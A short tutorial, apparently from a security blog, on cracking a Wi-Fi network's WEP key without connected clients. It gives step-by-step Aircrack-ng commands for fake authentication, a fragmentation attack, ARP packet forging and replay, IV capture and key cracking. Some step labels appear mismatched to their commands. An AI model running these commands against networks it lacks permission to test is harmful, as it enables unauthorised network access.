Before starting explaining how to crack WEP without clients, I assume you have a network card from this list, and the injections drivers installed (Kali is fully patched) if you have doubts check our tutorial – How to install Packet Injection Drivers on Linux!
After the drivers installed, we must test if everything is ok and if we are close enough to the Access Point (AP) to transmit packets to it!
- 1 Access Point
- 1 Laptop
- 1 Alfa Card
All tools in this tutorial come from Aircrack-ng framework;
How it works?
Cracking WEP is easy but we have to keep in mind what are our real world requirements and limitations we have to deal with. In this tutorial I will try to explain how to crack WEP without clients using fragmentation, fake authentication and ARP request replay attacks, for the curious i recommend read this two tutorials before – Conditions to crack a Wifi password, How WEP Works and WEP Attacks.
Let’s start with the theory, first we must put our network card into monitor mode to sniff the packets from the air, then we must fake the authentication with AP to trying obtain the PRGA key when applying the fragmentation attack. With the PRGA key in hands we must create a ARP packet and inject it, then we start collecting our unique IV’s once all packets are collected we need to crack them to extract the password.
- Proximity with AP
- AP Filter clients MAC addresses
- AP aren’t generating data packet’s
- If Fails use Chopchop Attack
or Interactive frame selection
Crack WEP without clients
Put the interface into monitor mode;
airmon-ng start wlan0 7
Fake authentication attack
aireplay-ng -1 0 -e Wifisec -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0
Keep alive the connection to AP
aireplay-ng -1 6000 -o 1 -q 10 -e Wifisec -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0
Create the Packet with the PRGA key
aireplay-ng -5 -b 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0
Inject the packet with PGRA key
packetforge-ng -0 -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request
Start capture the data and send to a file
airodump-ng -c 9 --bssid 9C:97:26:D7:94:71 -w capturedata mon0
aireplay-ng -2 -r arp-request mon0
aircrack-ng -b 9C:97:26:D7:94:71 capture*.cap